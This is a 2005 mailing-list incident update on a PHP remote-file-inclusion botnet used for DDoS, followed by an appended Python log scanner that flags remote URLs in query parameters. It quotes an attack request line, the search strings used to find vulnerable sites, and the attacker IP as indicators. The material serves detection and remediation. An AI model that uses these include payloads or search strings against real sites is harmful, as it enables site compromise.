Destructive botnet originating from Japan
Barrett G. Lyon
blyon at prolexic.com
Sat Dec 24 18:44:10 UTC 2005
Here is a little update:
As of last night authorities were able to seize the IRC server from
the ISP in Japan and there will be extensive follow-up on it. The DDoS
attack is now running headless in the happy range of about 3+ Gbps at
around 7-9M PPS. The bots will continue attacking us until they
receive the stop command from the bot master; there will never be a
stop command, so we will continue to see packet love for a few months
while people find that they are attacking us. We will publish a new
list of the bots on Monday as we idle with this low traffic rate over
the weekend.
The attacker was targeting a couple of customers that came into our
environment after other solutions failed to work for them. After
reviewing and comparing notes, it is obvious that the attacks were
assassination attempts from a competitor. There was no extortion
involved.
If you want to get the bots off your network, watch flow data
destined to AS32787 with SYN floods to TCP 80 as the destination.
Sites that use a PHP include (without validating the strings) to pull
up different web sections and pages are at risk; a lot of people are
reporting infection via "$section.php" and "$page.php". The attacker
appears to have used Google to locate sites that use includes in that
fashion (searching "index.php?page=" or "index.php?section=").
Reviewing infected machines for logs related to 210.170.60.2 would be
an easy way to locate a past infection, but it may not be reliable if
the attacker starts a new botnet. An example of the log data looks
something like this:
grep 210.170.60.2 access_log
210.170.60.2 - - [23/Dec/2005:11:45:37 +0000] "GET /index.php?section=http%3A//210.170.60.2/....? HTTP/1.0" 200 8010 "-" "Wget/1.6"
Happy hunting and have nice holidays!
-Barrett
--
Barrett Lyon
CTO and founder
Prolexic Technologies, Inc
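The grep above only catches requests from the one IP the post names. As an added example (not part of the original post or of Prolexic's tooling), the script below generalises the check: it parses Apache-style access_log lines and flags any request whose "section"/"page"-style query parameter carries a remote URL (http, https or ftp), which is the signature of the unvalidated PHP include being abused, regardless of which host the bot master is using this week. The sample log lines are constructed for the example; the first one mirrors the entry quoted in the post, the other addresses are documentation ranges. Function names and the known-IP list are the example's own assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample access_log lines. Line 1 mirrors the entry quoted in
# the post; the others are benign traffic or a variant using ftp:// and a
# different source address (198.51.100.7 is a documentation range).
SAMPLE_LOG = """\
210.170.60.2 - - [23/Dec/2005:11:45:37 +0000] "GET /index.php?section=http%3A//210.170.60.2/....? HTTP/1.0" 200 8010 "-" "Wget/1.6"
192.0.2.10 - - [23/Dec/2005:11:46:01 +0000] "GET /index.php?section=news HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [23/Dec/2005:12:02:15 +0000] "GET /index.php?page=ftp%3A%2F%2F198.51.100.7%2Finc.txt%3F HTTP/1.0" 200 8010 "-" "Wget/1.6"
192.0.2.11 - - [23/Dec/2005:12:05:44 +0000] "GET /about.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# IP named in the post as the include source; extend as new ones are published.
KNOWN_SCANNER_IPS = frozenset({"210.170.60.2"})

# Apache common/combined log format (referer and user-agent optional).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

# A parameter value that starts with a URL scheme is what a remote include needs.
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)


def parse_line(line):
    """Return the log fields as a dict, or None if the line is not in the expected format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def fully_decode(value, rounds=3):
    """Undo percent-encoding repeatedly (bounded) so a double-encoded scheme is still seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def remote_include_params(target):
    """List (name, decoded_value) for every query parameter whose value is a remote URL."""
    query = urlsplit(target).query
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        decoded = fully_decode(value)
        if REMOTE_URL_RE.match(decoded):
            hits.append((name, decoded))
    return hits


def scan_log(text, known_ips=KNOWN_SCANNER_IPS):
    """Return one finding per suspicious request, with the reasons it was flagged."""
    findings = []
    for raw in text.splitlines():
        entry = parse_line(raw)
        if entry is None:
            continue
        reasons = []
        for name, value in remote_include_params(entry["target"]):
            reasons.append(f"remote URL in parameter '{name}': {value}")
        if entry["ip"] in known_ips:
            reasons.append(f"request from known scanner IP {entry['ip']}")
        if reasons:
            findings.append({"ip": entry["ip"], "ts": entry["ts"],
                             "target": entry["target"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['target']}")
        for r in f["reasons"]:
            print(f"    - {r}")
```

Run it against a real access_log by replacing SAMPLE_LOG with the file contents; a hit on the remote-URL rule with a 200 status and a wget-style user agent matches the pattern in the post. The log check only finds past abuse; the application-side fix is to stop passing the parameter to include() at all and instead map it against a fixed list of local section files.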